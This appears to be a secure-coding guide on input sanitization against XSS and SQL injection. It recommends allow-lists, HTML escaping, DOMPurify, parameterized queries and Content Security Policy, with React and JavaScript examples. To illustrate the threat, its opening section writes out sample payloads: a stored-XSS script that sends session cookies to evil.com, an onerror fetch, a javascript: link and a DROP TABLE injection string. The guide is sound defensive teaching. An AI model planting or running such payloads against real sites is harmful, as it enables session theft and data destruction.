Input Sanitization

Clean and validate user-provided data before rendering or processing to prevent injection attacks.

By Den Odell

Problem

A user sets their display name to <script>document.location='https://evil.com/steal?c='+document.cookie</script>. Your profile template writes that string into the page’s HTML without escaping it, and now every visitor who views the profile has their session cookie shipped off to an attacker’s server. This is stored XSS, and it is one of the most damaging bugs you can ship because the payload lives in your database and fires automatically for every viewer. The victim does not have to click anything or make any mistake; one unescaped write on your side is enough.

The attack surface is wider than raw <script> tags. A comment of <img src=x onerror="fetch('/api/transfer?to=attacker')"> runs JavaScript the moment the broken image fails to load. A profile bio with <a href="javascript:steal()">click me</a> turns an innocent-looking link into code execution. Event handler attributes like onclick, onload, and onmouseover smuggle scripts past anyone who only filters for the word “script,” and SVG, <iframe>, and <object> elements each carry their own execution vectors. Attackers iterate faster than any deny-list of “known bad” strings can keep up.

Injection is not limited to the browser, either. The same untrusted name that breaks your page can break your database when it flows unescaped into a query as '; DROP TABLE users;--, and unclosed or deeply nested tags can corrupt your layout or hang the renderer. The common thread is trust: you accepted data from someone you do not control and handed it to an interpreter (the HTML parser, the SQL engine) that happily executes whatever it is given.

Solution

Build allow-lists, not deny-lists. Decide what you will permit and reject everything else, because enumerating every dangerous pattern is a losing game against attackers who only need to find one you missed. A username allow-list of [a-zA-Z0-9_-] is short, auditable, and immune to the next clever encoding trick.
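The same allow-list idea applies to link targets, where a javascript: URL is the thing to keep out. The sketch below is an illustration, not a complete URL policy: isSafeHref, SAFE_PROTOCOLS, and the placeholder base URL are hypothetical names chosen for this example. It parses the value with the standard URL constructor and accepts only schemes it recognizes, rather than searching the string for "javascript".

```javascript
// Hypothetical allow-list of URL schemes; adjust to what your feature needs.
const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);

function isSafeHref(href) {
  if (typeof href !== 'string') return false;
  let url;
  try {
    // The base URL is a placeholder so relative links like "/profile/42" still parse.
    url = new URL(href, 'https://example.invalid/');
  } catch {
    return false; // Unparseable input is rejected, not repaired.
  }
  // The parser normalizes case and strips tabs/newlines, so obfuscated
  // schemes resolve to their real protocol before the check runs.
  return SAFE_PROTOCOLS.has(url.protocol);
}

isSafeHref('/profile/42');          // true
isSafeHref('javascript:steal()');   // false
```

Letting the URL parser decide the scheme avoids the usual deny-list gaps, such as mixed case or whitespace inserted into the scheme name.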

For plain text, the cheapest and safest move is to never parse it as HTML at all. Setting textContent (or rendering through your framework’s default text binding) makes the browser treat input as literal characters, so <script> shows up on screen as visible text rather than executing. When you genuinely need a string of escaped HTML, convert the dangerous characters yourself: & becomes &amp; < becomes &lt; > becomes &gt; " becomes &quot; and ' becomes &#x27;.
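The character mapping above can be sketched as a small string function that also works outside the browser. The names escapeHtmlEntities and HTML_ENTITIES are hypothetical, chosen for this example.

```javascript
// The five characters named above and their entity replacements.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtmlEntities(input) {
  // A single pass over the string, so an "&" produced by one
  // replacement is never escaped a second time.
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

escapeHtmlEntities('<img src=x onerror="alert(1)">');
// => '&lt;img src=x onerror=&quot;alert(1)&quot;&gt;'
```

Because it escapes both quote characters, the result is suitable for quoted attribute values as well as element content.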

When the feature actually requires rich text (a comment editor, a markdown preview), reach for a maintained sanitizer like DOMPurify rather than a hand-rolled regex. DOMPurify parses the input into a DOM, walks it against an allow-list of safe tags and attributes, strips dangerous elements (<script>, <iframe>, <object>), event handler attributes (onerror, onclick), and javascript: URLs, and returns markup that is safe to insert as HTML. Regex-based HTML filtering is notoriously easy to bypass; do not write your own.

Sanitize at the boundary where untrusted data enters, validate formats against schemas or precise patterns, and parameterize every database query instead of concatenating strings. Layer Content Security Policy headers on top as defense-in-depth: a strict CSP that forbids inline scripts can neutralize an XSS payload even if a sanitization bug slips through. No single control is sufficient on its own, which is exactly why you stack them.
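Two of these layers can be sketched without any framework. The table and column names, the findUserByNameQuery helper, and the exact policy string are assumptions made for this example, and the policy is one possible strict configuration rather than a recommendation for every site.

```javascript
// Parameterized query: the SQL text is fixed and the untrusted value
// travels separately, so it is never interpreted as SQL.
// Hypothetical table and column names, for illustration only.
function findUserByNameQuery(name) {
  return {
    text: 'SELECT id, display_name FROM users WHERE display_name = $1',
    values: [name],
  };
}

// A strict Content-Security-Policy header value. Leaving 'unsafe-inline'
// out of script-src is what blocks inline <script> and onerror= payloads.
const CONTENT_SECURITY_POLICY = [
  "default-src 'self'",
  "script-src 'self'",
  "object-src 'none'",
  "base-uri 'none'",
].join('; ');

const query = findUserByNameQuery("'; DROP TABLE users;--");
// query.text is identical for every input; the hostile string
// appears only in query.values.
```

The { text, values } shape matches the query config object accepted by node-postgres, so with a configured pool (an assumption here) it could be passed directly to pool.query(). Other drivers use different placeholder syntax, such as ? instead of $1.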

Example

These examples sanitize untrusted HTML before rendering it. The approach is genuinely per-framework because each one has a different escape hatch for injecting raw HTML, so each needs its own guard. The version below uses React, whose escape hatch is dangerouslySetInnerHTML.

Sanitizing Rich Text Before Rendering

import DOMPurify from 'dompurify';

function Comment({ html }) {
  // Sanitize untrusted HTML, then opt in to raw rendering.
  const clean = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'ol', 'li'],
    ALLOWED_ATTR: ['href']
  });

  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}

Escaping HTML Without a Library

When you only need plain text rendered safely, let the browser do the escaping for you. Assigning to textContent and reading back innerHTML converts &, <, and > into entities, with no parsing of the input as markup. It does not escape quotes, so use the result only as element content, never inside an attribute value:

function escapeHTML(input) {
  const el = document.createElement('div');
  // textContent stores input as literal text; reading innerHTML serializes & < > as entities (quotes are left as-is).
  el.textContent = input;
  return el.innerHTML;
}

escapeHTML('<img src=x onerror=alert(1)>');
// => "&lt;img src=x onerror=alert(1)&gt;"  (inert text, never executes)

Validating Formats With an Allow-List

Reject malformed input at the boundary instead of trying to clean it. Match against a tight pattern of permitted characters and refuse anything outside it:

const RULES = {
  username: /^[a-zA-Z0-9_-]{3,20}$/,
  email: /^[^\s@]+@[^\s@]+\.[^\s@]+$/
};

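function validate(field, value) {
  // Look up own keys only, so 'constructor' or 'toString' never resolve to inherited members.
  const pattern = Object.hasOwn(RULES, field) ? RULES[field] : undefined;
  // Require a string: RegExp.test() would otherwise coerce arrays and objects.
  if (!pattern || typeof value !== 'string' || !pattern.test(value)) {
    throw new Error(`Invalid ${field}`);
  }
  return value;
}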

validate('username', 'jane_doe-42');         // ok
validate('username', '<script>alert(1)</script>'); // throws: Invalid username

Benefits

  • Neutralizes stored and reflected XSS by turning malicious markup into inert text before it ever reaches the HTML parser.
  • Allow-lists stay robust as attackers invent new payloads, because you define what is permitted rather than chasing what is forbidden.
  • A maintained sanitizer like DOMPurify covers obscure vectors (SVG, mutation XSS, javascript: URLs) that hand-rolled filters miss.
  • Format validation at the boundary stops bad data early, preventing both security holes and downstream display bugs.
  • Parameterized queries close off SQL injection while keeping the database layer simple and readable.
  • Pairs naturally with output encoding and a strict Content Security Policy for layered, defense-in-depth protection.
  • Validating once at the entry point gives the rest of the application data of a known shape, reducing scattered, error-prone checks (output encoding still applies wherever that data is rendered).

Tradeoffs

  • Sanitization that is too aggressive strips legitimate content, frustrating users who see their formatting or special characters silently removed.
  • Allow-lists need maintenance; a tag or attribute you forgot to permit results in support tickets when valid input gets rejected.
  • Rich-text sanitization is genuinely hard, and rolling your own with regex is a near-guaranteed bypass. You are taking a dependency on a library you must keep updated.
  • Mutation XSS and parser quirks mean even good sanitizers ship security patches, so pinning an old version of DOMPurify is itself a risk.
  • Sanitization is not encoding. Cleaned data still needs context-appropriate output encoding for HTML attributes, URLs, and JavaScript contexts.
  • Running sanitization on the client only protects the client; untrusted data must also be validated and sanitized on the server, since attackers can skip your UI entirely.
  • Visibly modifying user input after submission (trimming, stripping tags) can confuse people who do not understand why their text changed.
  • Treating data as “safe forever” after one pass is dangerous if it later flows into a different context, such as a query, a shell command, or an email header.
  • Heavy sanitization of large documents adds measurable parsing cost, which matters for high-throughput rendering or server-side workloads.
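The point above about context-appropriate output encoding can be made concrete with two contexts that HTML entity escaping does not cover. This is a minimal sketch with hypothetical helper names (encodeForUrlParam, encodeForInlineScript), not a full encoding library.

```javascript
// URL query-string context: percent-encode the value so characters like
// & and = cannot add or alter parameters.
function encodeForUrlParam(value) {
  return encodeURIComponent(String(value));
}

// Inline <script> context: serialize as JSON, then escape "<" so the data
// cannot close the script element with "</script>".
// Assumes value is JSON-serializable (not undefined or a function).
function encodeForInlineScript(value) {
  return JSON.stringify(value).replace(/</g, '\\u003c');
}

encodeForUrlParam('a&b=c d');
// => 'a%26b%3Dc%20d'
```

The output of encodeForInlineScript is still valid JSON, so JSON.parse recovers the original value on the other side.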

Summary

Input sanitization defends against injection by cleaning untrusted data at the boundary, favoring allow-lists over deny-lists, escaping HTML entities for plain text, and delegating rich-text cleaning to a maintained sanitizer like DOMPurify rather than a regex. Treat it as one layer among several: combine it with format validation, parameterized queries, output encoding, and a strict Content Security Policy, and always enforce the same checks on the server, never the client alone.
